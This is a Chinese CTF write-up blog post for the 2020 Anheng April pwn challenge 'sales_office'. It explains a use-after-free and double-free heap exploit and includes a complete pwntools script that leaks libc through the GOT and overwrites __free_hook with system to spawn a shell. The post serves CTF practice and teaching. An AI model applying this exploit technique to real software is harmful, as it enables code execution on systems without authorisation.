(uaf/double free)2020安恒杯4月赛sales_office

最新推荐文章于 2024-03-06 21:05:06 发布
最新推荐文章于 2024-03-06 21:05:06 发布
阅读量756 收藏
点赞数
分类专栏: 赛事复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42037374/article/details/105980465
版权

索引

基本信息

	Arch:     amd64-64-little
	RELRO:    Partial RELRO
	Stack:    Canary found
	NX:       NX enabled
	PIE:      No PIE (0x400000)
	dynamically
	18.04

IDA分析

add

在这里插入图片描述

show

在这里插入图片描述

free

在这里插入图片描述

思路
  1. 申请的chunk最大为0x60 存在uaf和double free
  2. 利用uaf没有将ptr置为NULL。修改fd指向got,然后得到libc_base
  3. 修改free_hook为system然后free 触发!

exp图

在这里插入图片描述

exp

#coding: utf-8
from pwn import *
context.log_level = 'debug'
local =1
if local:
    p = process("./sales_office")
    elf = ELF("./sales_office")
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
else:
    p = remote()
    elf = ELF("")
    libc = elf.libc

def add(size,content):
    p.sendlineafter("choice:","1")
    p.sendlineafter("size of your house:",str(size))
    p.sendlineafter("please decorate your house:",content)

def show(index):
    p.sendlineafter("choice:","3")
    p.sendlineafter("index:\n",str(index))
def free(index): 
    p.sendlineafter("choice:","4")
    p.sendlineafter("index:\n",str(index))

def debug():
    print("[+]----pid%s"%proc.pidof(p)) 
    pause()    
lg=lambda address,data:log.success('[+]---->%s: '%(address)+hex(data))

def pwn():
    #-----uaf fd
    add(0x20,"a"*0x10) #0
    add(0x20,"b"*0x10) #1
    add(0x20,"/bin/sh\x00") #2
    
    free(1)
    free(0)
    add(8,p64(elf.got['puts'])) #3
    show(1)
    p.recvuntil("house:\n")
    libc_base = u64(p.recv(6).ljust(8,"\x00"))-0x809c0
    lg("libc_base",libc_base)
    #-----
    free_hook = libc_base+libc.sym['__free_hook']
    system_addr = libc_base +libc.sym['system']
    lg("free_hook",free_hook)
    #-----double free
    free(3)
    free(3)
    add(0x8,p64(free_hook))
    add(0x20,"p"*0x10)
    add(0x8,p64(system_addr))

    free(2)
    #debug()

    p.interactive()

if __name__ == "__main__":
    pwn()

知识点

uaf 利用特性:没有清空指针,如何可以修改fd指针可以达到任意地址读写的操作
double free特性: 能对同一个chunk free两次,结合uaf修改可以任意读写
#-----问题1
Cannot get main_arena's symbol address. Make sure you install libc debug file (libc6-dbg & libc6-dbg:i386 for debian package).
can't find heap info
#-----解决1
apt-get install lib32z1 lib32ncurses5
apt-get install lib32stdc++6
Jc^
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
强网杯:简单的UAF,fastbin attack打全局list,然后任意地址读写.zip
12-18
:“强网杯:简单的UAF,fastbin attack打全局list,然后任意地址读写.zip”揭示了网络安全竞赛中的一个常见技术挑战,主要涉及的是C/C++程序中的内存管理漏洞利用,特别是未初始化的指针引用(Use-After-Free, UAF...
OMG 统一架构框架 (UAF) V1 英文版
08-29
Unified Architecture Framework (UAF) V1 This Appendix describes the Unified Architecture Framework, the Domain Meta-Model (DMM) that captures the concepts, relationships, and viewpoints that specify ...
[uaf + double free] de1ctf_2019_weapon
huzai9527的博客
09-22 309
[uaf + double free] de1ctf_2019_weapon 1. ida分析 删除的时候,只是检查了index范围,没有检查是否存在,存在double free 并且free后,指针没有置空,存在uaf 限制了chunk大小,需要通过uaf 构造fake chunk,修改chunk head的大小,构造unstored bin attack 2. 思路 1⃣️申请3个chunk 0,chunk 1,chunk 2,用chunk 0伪造chunk 1 的head,free chunk
2020安恒杯元旦月赛-爆破鬼才-ZIP注释信息+CRC32爆破+outguess隐写爆破+生日字典
xnightmare的博客
01-03 2174
MISC 爆破鬼才 给出的是一个压缩包,压缩包中有注释信息,注释信息给出了解压密码的范围: 使用ARCHPC爆破即可得到密码:abc123 解压之后里面又是一个压缩包,压缩包里面包含几个文件: 使用010 Editor查看具体信息之后发现360给出的文件大小其实是不准确的,1.txt、2.txt、3.txt压缩前的大小分别为4 bytes、2 bytes、2 bytes,因此可以用CRC32碰...
2020.4月安恒月赛之杂项
cm_zl
04-25 622
blueshark 发现是取证题,首先寻找特殊字符串,找到一个what_you_want.7z 下面的16进制头是377abc是7z压缩包文件头,将之复制出到winhex。 保存7z压缩包,里面有一个加密文件。提示密码是蓝牙密码。 在wireshark中查找字符串,PIN,发现密码 最后打开文件,得到flag flag{快去试试吧!} ...
安恒月赛2020年DASCTF——四月春季赛---Web-Writeup
SopRomeo的博客
04-29 3637
比赛的时候去玩了,刚好兄弟们发了第一个web的源码,于是我自己复现了一下 <?php show_source("index.php"); error_reporting(0); function write($data){ return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data); } function read($data){...
新手求救!!!
CSD_zhouzhou的博客
05-10 187
求哪位大神帮我做一下
uaf42.zip_uaf42_uaf42 design_uaf42-data
09-23
标题中的“uaf42.zip_uaf42_uaf42 design_uaf42-data”表明这是一份关于“uaf42”设计的压缩文件,重点在于“uaf42”的设计及其相关数据。描述中提到的是使用“uaf42”设计的有源滤波器,并记录了高通滤波器的设计...
fido-uaf-v1.0-rd-20141008.zip_FIDO UAF1.0Client_U2F_fido uaf1.0
09-19
密码可以简单到仅有4个数字。最终用户携带一个简单的U2F设备可以用于任何支持该协议的应用上。用户得到一个通过一个简单的KEY设备得到一个安全的环境。这个文档是对U2F协议和一个阅读详细文当前的概述。
fido-uaf-v1.0-ps-20171208-cn-pass.rar_IFAA_fido specification_中文
09-15
4.FIDO UAF 应用API和传输绑定规范 v1.0.pdf 5.FIDO UAF 认证器控制命令 v1.0.pdf 6.FIDO UAF 认证器特定模块API v1.0.pdf 7.FIDO UAF 认证器元数据声明 v1.0.pdf 8.FIDO UAF 认证器元数据服务 v1.0.pdf 9.FIDO UAF ...
理解 glibc malloc:主流用户态内存分配器实现原理
热门推荐
猫科龙
07-21 2万+
本篇文章主要完成了对《Understanding glibc malloc》的翻译工作。限于本人翻译水平与专业技术水平(纯粹为了了解内存分配而翻),本文章必定会有很多不足之处,请大家见谅,也欢迎大家的指正! 联系邮箱:974985526@qq.com。
So So So……
happmaoo的专栏
12-26 290
MorningMemoriesWakingatthebreakofmorning,Memoriespasswithoutwarning.Openingmyeyes,Iclearlysee,Imagesofonlyyouandme.ThroughoutthedayIreflectonyou,Rosepetalsoftnesstouchedbymorningdew.Yourswanlikegracea...
de1ctf_2019_weapon
z1r0的博客
03-10 419
de1ctf_2019_weapon 查看保护 一个uaf但是没有show功能 攻击思路:没有show功能,所以需要攻击stdout来泄露libc 1.利用double free这个特性将一个chunk的大小改成0x91,这里需要注意2.23下的检测size 2.释放掉0x91之后会产生unstorted bin,再将0x91变成0x71(fastbin 3.使用fastbin attack改fd为stdout这附近(要过size检测 申请到25dd这里,这里笔者本地关了随机化。打远程的时候需要爆破
初学堆 UAF漏洞及double free 利用手法(libc2.23)
最新发布
weixin_66751120的博客
03-06 899
UAF漏洞及double free 利用手法(libc2.23) 通过一道例题加深理解
一道基础的uaf的两种食用方法double free
fuiifiuiii的博客
02-28 490
然后把它填上,free一个fastbin大小的块,修改fd指针为打hook的地址,创建两个块,第二个块就覆盖到打hook的地址那里了。以前看double free,总以为很难很难的样子,实际上动手调一调看看,也就是基本的uaf罢了。长度自定,可以堆溢出,但是这两种做法没有用到,以后考虑用它试着unlink啥的。先创建0x80的块,free掉,从unsorted bin 里打印泄露出libc。甚至不用改名字,出题人都给把名字叫好了(爱了爱了),这样子调试的时候很舒服。连接情况2->3->2。
Double Free浅析(泄露堆地址的一种方法)
omnispace的博客
04-18 7191
Double Free其实就是同一个指针free两次。虽然一般把它叫做double free。其实只要是free一个指向堆内存的指针都有可能产生可以利用的漏洞。double free的原理其实和堆溢出的原理差不多,都是通过unlink这个双向链表删除的宏来利用的。只是double free需要由自己来伪造整个chunk并且欺骗操作系统所以好像和普通的堆溢出伪造chunk然后free触发unlink...
2020安恒4月赛pwn(看看还能不能更)
doudoudedi
04-25 705
orz没赶上回家已经5点半了就回顾了一下pwn题 挺好的出的 思路 就是uaf控制好堆块然后写到got表leaklibc然后再次做一次写free为system即可 exp: #!/usr/bin/python2 from pwn import * def pwn(): p=process('./sales_office') elf=ELF('./sales_office') libc=ELF...
2018 6月安恒杯月赛
weixin_40423072的博客
09-03 1836
更一下比赛的 解析吧。安恒杯的 三题web,唔,平台关了所以,链接就 随缘了! 第一题 嗯,遇到就点吧,点击的时候页面不会跳转但是还是会有反应的,如果右键打开之后会有新的路径,后面有跟一个microsoft 的教程。那 这题就是一个 注入吧 但是常规注入并不能注入进去,无奈。Redis的注入也没有,于是看了解析之后我们就很自然的可以想到MongoDB注入,怎么说呢。只要想到他就能做出来,百度一...
uaf pwn hacknote
09-26
根据提供的引用内容,hacknote程序存在Use After FreeUAF)漏洞。UAF是一种内存安全漏洞,它发生在程序试图使用已经被释放的内存区域时。在hacknote程序中,delete_note函数中释放了note对象的内存,但没有将对应的指针设置为NULL。这就导致在之后的操作中,如果再次访问已释放的内存,就会发生UAF漏洞。 攻击者可以利用UAF漏洞来实现攻击,例如修改已经被释放的内存中的内容,控制程序的执行流程,实现任意代码执行、信息泄露等攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值